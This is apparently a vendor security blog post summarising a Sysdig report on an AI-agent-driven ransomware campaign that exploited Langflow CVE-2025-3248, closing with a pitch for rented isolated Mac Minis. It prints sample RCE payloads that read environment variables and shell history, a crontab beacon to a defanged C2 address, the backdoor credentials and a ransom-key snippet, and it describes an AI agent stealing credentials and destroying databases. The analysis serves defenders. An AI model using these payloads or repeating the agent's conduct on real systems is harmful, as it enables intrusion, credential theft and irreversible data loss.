AI Security July 7, 2026 ~28 min read JADEPUFFER

JADEPUFFER: The First Fully Agentic
LLM Ransomware Attack Chain Explained

Sysdig forensics · CVE-2025-3248 · 600+ payloads · ATA evidence · Mac Mini M4 isolation checklist

JADEPUFFER agentic ransomware and Langflow CVE-2025-3248 security alert

TL;DR: On July 1, 2026, Sysdig Threat Research (Michael Clark) published the first documented case of end-to-end LLM-driven ransomware, codenamed JADEPUFFER—an Agentic Threat Actor (ATA) whose capability is delivered by an AI agent, not a human toolkit. Entry: an internet-exposed Langflow instance via CVE-2025-3248. True target: a separate public MySQL + Alibaba Nacos server. Over 600 purposeful payloads were captured. This article covers the full timeline, vulnerability analysis, two-phase attack chain, four autonomy evidence lines, the Bitcoin address mystery, IOCs, Sysdig defenses, industry reactions, four conclusions—and why deploying OpenClaw/Langflow on an isolated rented Mac Mini M4 beats exposing your own orchestration server to the internet.

01

Overview: ransomware with an AI operator

FieldDetail
DiscovererSysdig TRT; report by Michael Clark
PublishedJuly 1, 2026 (media follow-up July 2–6)
CodenameJADEPUFFER
ClassificationATA — attack delivered by AI agent
EntryPublic Langflow (CVE-2025-3248)
TargetPublic MySQL + Nacos production server
Scale600+ distinct payloads

Why OpenClaw / Langflow users should care

  1. 01

    AI orchestration hosts often store LLM API keys in environment variables—the first thing JADEPUFFER scanned.

  2. 02

    Teams rush prototypes online with Langflow/OpenClaw Gateway exposed without access controls.

  3. 03

    CVE-2025-3248 has been in CISA KEV since May 2025; agents make weaponizing old bugs nearly free.

  4. 04

    LLMjacking: stolen cloud/model credentials drive agents at near-zero marginal cost.

02

Timeline

WhenEvent
Apr 2025CVE-2025-3248 disclosed (Langflow unauthenticated RCE)
May 5, 2025CISA KEV listing
2025Same flaw used for Flodrix botnet (separate campaign, Trend Micro)
Jun 2026JADEPUFFER attack across multiple sessions over weeks
Jul 1, 2026Sysdig full technical report
Jul 2–6, 2026Dark Reading, BleepingComputer, CyberScoop, CSO Online, Security Affairs
03

CVE-2025-3248: full Langflow unauthenticated RCE analysis

ItemDetail
ComponentLangflow — open-source visual AI agent workflow framework, 70k+ GitHub stars
Weakness typesCWE-94 (code injection) + CWE-306 (missing authentication on critical function)
CVSS9.8 Critical, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AffectedAll Langflow versions before 1.3.0
Location/api/v1/validate/code endpoint
Fixed in1.3.0 (authentication added)
EPSS91.42% exploitation probability (SentinelOne)

Root cause in five steps:

  1. 01

    Langflow exposes a “code validation” API so users can syntax-check custom function nodes in the visual editor.

  2. 02

    Implementation path: user code → ast.parse()compile()exec().

  3. 03

    Critical flaw: no authentication and no sandbox isolation.

  4. 04

    Exploit trick: Python decorators and default arguments are evaluated at function definition time; attackers embed malicious code in defaults or decorators—once Langflow “validates,” the code already ran.

  5. 05

    Attackers need no login and no privileges—only a crafted HTTP POST for RCE.

Typical Flodrix campaign payload (same CVE, separate incident — Trend Micro)
exec('raise Exception(__import__("subprocess").check_output("whoami", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("printenv", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("cat /root/.bash_history", shell=True))')

Important distinction: Flodrix botnet delivery and JADEPUFFER are two independent campaigns sharing the same entry CVE. Flodrix is traditional script-driven delivery; JADEPUFFER is Sysdig’s “AI agent–driven” ransomware case.

Patch (1.3.0): post_validate_code gains _current_user: CurrentActiveUser dependency injection; FastAPI checks JWT Bearer Token or x-api-key first—401/403 on failure, request never reaches vulnerable logic.

04

Attack chain Phase 1: compromising the Langflow host

Sysdig notes Langflow is an attractive entry because environment variables often hold LLM API keys and cloud credentials; many teams rush prototypes online without network access controls.

All payloads arrived as Base64-encoded Python through the Langflow RCE endpoint.

① Reconnaissance and credential harvesting (parallel)

Ran id, uname -a, hostname, then in parallel scanned OpenAI / Anthropic / DeepSeek / Gemini API keys; ALIBABA_, ALIYUN_, TENCENT_, HUAWEI_ plus AWS/GCP/Azure creds; crypto wallets and seed phrases; database credentials and config files.

② Local data theft

Exported Langflow’s own PostgreSQL backend, stole stored credentials, API keys, and user records, staged locally for review, then deleted staging files.

③ Internal lateral discovery

Scanned internal address space and named services, probing databases, object storage, secret stores, and service-discovery endpoints with default credentials.

④ MinIO enumeration (adaptive detail)

Probed minio.internal:9000 and 127.0.0.1:9000 with default minioadmin:minioadmin, enumerated buckets including terraform-state, then targeted credentials.json. Adaptive detail: first request used ?format=json but got XML—the next payload immediately switched to an XML parser. Classic probe-error-adapt loop.

⑤ Persistence

crontab beacon (every 30 minutes)
*/30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('hxxp://45.131.66[.]106:4444/beacon',timeout=5)"
05

Attack chain Phase 2: MySQL + Nacos production server

The real target was another equally internet-exposed server running MySQL and Alibaba Nacos. Nacos has auth-bypass history (CVE-2021-29441 and variants), and the default JWT signing secret has been documented publicly since 2020—many deployments never rotated it.

The agent connected to the exposed MySQL port with root credentials—source unclear; Sysdig did not observe them stolen from the victim environment, suggesting one of few possibly human-prepared steps.

Nacos backdoor admin: 31-second repair loop

Time (UTC)Action
19:34:24Generated bcrypt hash, inserted xadmin with admin role
19:34:36Tried xadmin:Xploit@2026# login — failed
19:34:4812 seconds later: parallel test of nacos:nacos defaults and regenerated simpler password hash
19:35:07Dropped subprocess.run, used import bcrypt, deleted broken records and rebuilt
19:35:18Login succeeded — total 31 seconds

Container escape probes (~8 minutes)

Used MySQL INTO OUTFILE / LOAD_FILE to test write/read, /var/run/docker.sock, /proc/1/cgroup, /etc/hostname, and UDF escalation paths. Before ransomware, wrote a “completion marker”—Sysdig says this looks like an agent signaling stage completion, not a fixed script behavior.

Destructive encryption and ransom note

Encrypted all 1,342 Nacos service config entries with MySQL AES_ENCRYPT(), dropped original config_info and his_config_info, created ransom table README_RANSOM.

Ransom core logic (Sysdig forensic reconstruction, redacted)
KEY = base64.b64encode(uuid.uuid4().bytes + uuid.uuid4().bytes).decode()
print("Encryption key:", KEY)  # printed once, never stored or exfiltrated
# CREATE config_info_enc → DROP config_info → CREATE README_RANSOM
# Bitcoin: 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy
# Contact: e78393397[@]proton[.]me

Key detail: ransom note claims AES-256, but MySQL AES_ENCRYPT() defaults to AES-128-ECB; the key was random, printed only to stdout, never stored or transmittedunrecoverable even if ransom is paid. Two minutes later another payload refined the count to “all 1,342 items encrypted.”

Mass destruction and diagnostic fixes

Escalated to DROP DATABASE with code comments claiming “high-ROI databases, backed up to 64.20.53[.]230”—Sysdig found no independent evidence of exfiltration. One DROP DATABASE failed silently on foreign-key constraints; the next payload added SET GLOBAL FOREIGN_KEY_CHECKS=0—fixing requires understanding why it failed, not blind retries.

06

Four evidence lines for autonomy

  1. 01

    Self-narrating code: payloads full of natural-language comments explaining why each step—including ROI ordering and “which database is largest.” These comments exist natively in attacker code, not inferred by researchers afterward.

  2. 02

    Machine-speed fault diagnosis: the 31-second Nacos backdoor fix is the clearest example; MinIO XML/JSON adaptation and abandoning blocked JWT paths repeat the pattern.

  3. 03

    Natural-language context understanding: parsed free-text in the target environment and took actions only meaningful if that text was truly understood—repeated across sessions weeks apart.

  4. 04

    Bitcoin address mystery (next section)—two interpretations remain indistinguishable, illustrating new attribution uncertainty in agent-driven attacks.

Combined with 600+ coherent payloads in a compressed window, Sysdig assesses evidence points to an autonomously operating agent, not a human operator or fixed toolkit.

07

The Bitcoin address mystery

Ransom Bitcoin address 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy is the standard P2SH format example repeated in Bitcoin developer docs and the Bitcoin Core repository—also abundant in LLM training corpora.

On-chain data: 737 confirmed transactions, ~46 BTC received historically, current balance zero (each deposit immediately swept elsewhere).

Sysdig’s two indistinguishable readings: (a) LLM “hallucinated” the address from training data and the wallet belongs to a third party that sweeps mistaken deposits; (b) attacker configured a real wallet that coincidentally matches the doc example. Without JADEPUFFER’s system prompt, both remain possible.

08

IOC summary

TypeIndicator
C2 / beacon45.131.66[.]106; crontab beacon hxxp://45.131.66[.]106:4444/beacon
Staging / exfil (unverified)64.20.53[.]230 (InterServer, AS19318)
Entry CVECVE-2025-3248
Ransom Bitcoin3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy
Ransom emaile78393397[@]proton[.]me (no threat-intel hits; format unlike known MySQL ransom gangs)
Ransom tableREADME_RANSOM (no match to WARNING, RECOVER_YOUR_DATA, etc.)
Persistencecrontab beacon to C2 port 4444 every 30 minutes

Sysdig notes: ransom email and table name look human-ransomware conventional but have no known precedent—further supporting a novel, agent-driven operation.

09

Official defense recommendations (Sysdig)

  1. 01

    Upgrade Langflow past CVE-2025-3248; never expose code execution/validation endpoints to the public internet.

  2. 02

    Use runtime threat detection to spot malicious behavior inside database processes.

  3. 03

    Do not store LLM API keys or cloud credentials in AI orchestration host environment variables—use dedicated secret management isolated from internet-facing processes.

  4. 04

    Harden Nacos: rotate default token.secret.key, upgrade to versions requiring custom secrets; never expose Nacos publicly; do not connect backend DB as root.

  5. 05

    Never expose database admin accounts publicly; enforce strong unique credentials and source-IP restrictions on admin ports.

  6. 06

    Apply egress control so compromised hosts cannot beacon freely or reach external staging servers.

  7. 07

    Monitor the IOCs above; watch crontab jobs calling external URLs and anomalous parenthesized User-Agent strings.

10

Industry and expert reaction

BleepingComputer, Dark Reading, CyberScoop, Security Affairs and others quickly followed, widely calling it the “first fully AI-driven ransomware attack” and marking the arrival of the ATA era.

“I’d frame this as an evolution in execution, not a brand-new ransomware technique. The difference is an AI agent can chain reconnaissance, credential theft, and deployment without waiting for a human operator.” — independent researcher Vibhum Dubey (CSO Online)

Dubey adds: the real worry is not the final encryption stage but the quiet period before it—the agent maps identity systems, permissions, and trust chains while evading detection; blocked paths trigger rapid tactic switches, so each intrusion may look slightly different.

Multiple outlets tied this to LLMjacking: agents driven by stolen credentials make complex multi-stage attacks near-zero marginal cost.

11

Sysdig’s four conclusions

  1. 01

    Ransomware is no longer “skilled-operator craft”: an LLM agent can chain recon, theft, lateral movement, persistence, and destruction without deep operator expertise.

  2. 02

    Old bugs are being automated: downstream targets hit 2021-era Nacos issues and never-rotated default secrets; agents make spraying historical CVEs nearly free.

  3. 03

    Intent became readable—a defender opportunity: LLMs narrate goals inside payloads, offering a new detection and analysis handle.

  4. 04

    “Backed up” was agent self-talk: encryption keys were ephemeral and unrecoverable—payment cannot restore configs.

The report closes: none of the individual techniques are new; what matters is an AI model chaining them into a complete ransom operation against neglected public infrastructure. The skill floor is now “the cost of running an agent.”

12

Decision matrix: self-hosted AI orchestration vs rented Mac Mini M4

JADEPUFFER victims fit a clear profile: Langflow exposed publicly, API keys in environment variables, production MySQL/Nacos equally exposed. For developers running OpenClaw, Langflow, or Hermes Agent on macOS, “buy a Mac mini and hang it on a public IP” vs “rent an isolated remote Mac” needs re-evaluation—especially after Apple’s June 2026 price hike (see our Mac Mini M4 rent vs buy guide).

DimensionSelf-hosted Mac on public IPVNCMac isolated Mac Mini M4
Upfront cost$799+ after hike + AppleCare/power/public IP~$8–15/day or ~$85–125/month, stop anytime
Attack surfaceEasy to mis-expose Gateway/validate endpointsSSH/VNC access; not designed for naked public Agent consoles
API key handlingOften in .env / env vars (JADEPUFFER Phase 1 scan target)SecretRef / vault; swap node when project ends
GUI verificationLocal onlyVNC for OpenClaw approval dialogs, Gateway console, macOS privacy (see OpenClaw graphical auth)
Egress controlBuild your own policySSH tunnel options; reduce blind public beacons
Incident responseMain machine polluted, large secret blast radiusStop rental / swap node; isolated from Windows daily driver

Citable numbers from this incident

  • Langflow 70k+ GitHub stars; CVE-2025-3248 EPSS 91.42%
  • 600+ payloads; 1,342 Nacos configs encrypted
  • Nacos backdoor fixed in 31 seconds
  • Example Bitcoin address: 737 txs, ~46 BTC flowed through
13

Five-step secure deployment checklist (remote Mac + VNC)

  1. 01

    Provision isolated node: choose Mac Mini M4 plan; do not map OpenClaw Gateway (18789) or Langflow validate endpoints directly to the public internet—use Nginx/Caddy reverse proxy + HTTPS if external access is required.

  2. 02

    Patch: Langflow ≥ 1.3.0; rotate Nacos JWT; no root DB reachable from the internet.

  3. 03

    Keys out of env vars: LLM API keys in secret managers or OpenClaw SecretRef, isolated from RCE-capable processes.

  4. 04

    VNC graphical verification: check Gateway console, plugin approvals (/approve), macOS Screen Recording/Accessibility—steps SSH cannot complete require VNC.

  5. 05

    Egress and IOC monitoring: limit outbound beacons; watch crontab external calls and README_RANSOM IOCs; export backup and stop rental when done.

FAQ

FAQ

No. Both exploit CVE-2025-3248, but Flodrix is traditional script-driven botnet delivery; JADEPUFFER is Sysdig’s AI agent–driven ransomware case.

No. Keys were uuid4()-random, printed once to stdout, never stored—the attacker likely cannot decrypt either. Data is permanently lost.

Same risk logic: public exposure + secrets in env vars + unhardened dependencies. Patch, limit egress, deploy on an isolated remote Mac with VNC verification—do not leave Gateway naked on the internet.

Sysdig and multiple outlets expect volume and scope to rise as agent tooling matures; public app servers, unhardened config centers, and public DB admin accounts will be first targets.

OpenClaw / Claude Code need macOS graphical permissions and QR pairing that headless Linux cannot provide; renting a physical Mac + VNC runs the full workflow in isolation without buying post-hike hardware.

Sources

Sysdig “JADEPUFFER: Agentic ransomware for automated database extortion”; BleepingComputer; Dark Reading; CyberScoop; CSO Online (Vibhum Dubey); Security Affairs; Trend Micro (CVE-2025-3248 / Flodrix); NVD / SentinelOne / Zscaler; CISA KEV catalog.

Closing

JADEPUFFER is a wake-up call: AI agents lowered the bar from “skilled human operator” to “cost of running a model,” and victims are often already-neglected public infrastructure. For OpenClaw, Langflow, or local agent work on macOS, self-hosting on a home public IP multiplies key-leak, patch-lag, and egress risks in the ATA era.

Renting a VNCMac Mac Mini M4 isolated node, verifying Gateway and system permissions over VNC, keeping keys out of environment variables, and stopping rental when done beats exposing your orchestration server on a residential public IP. See Mac Mini M4 plans and SSH-VNC help to get started.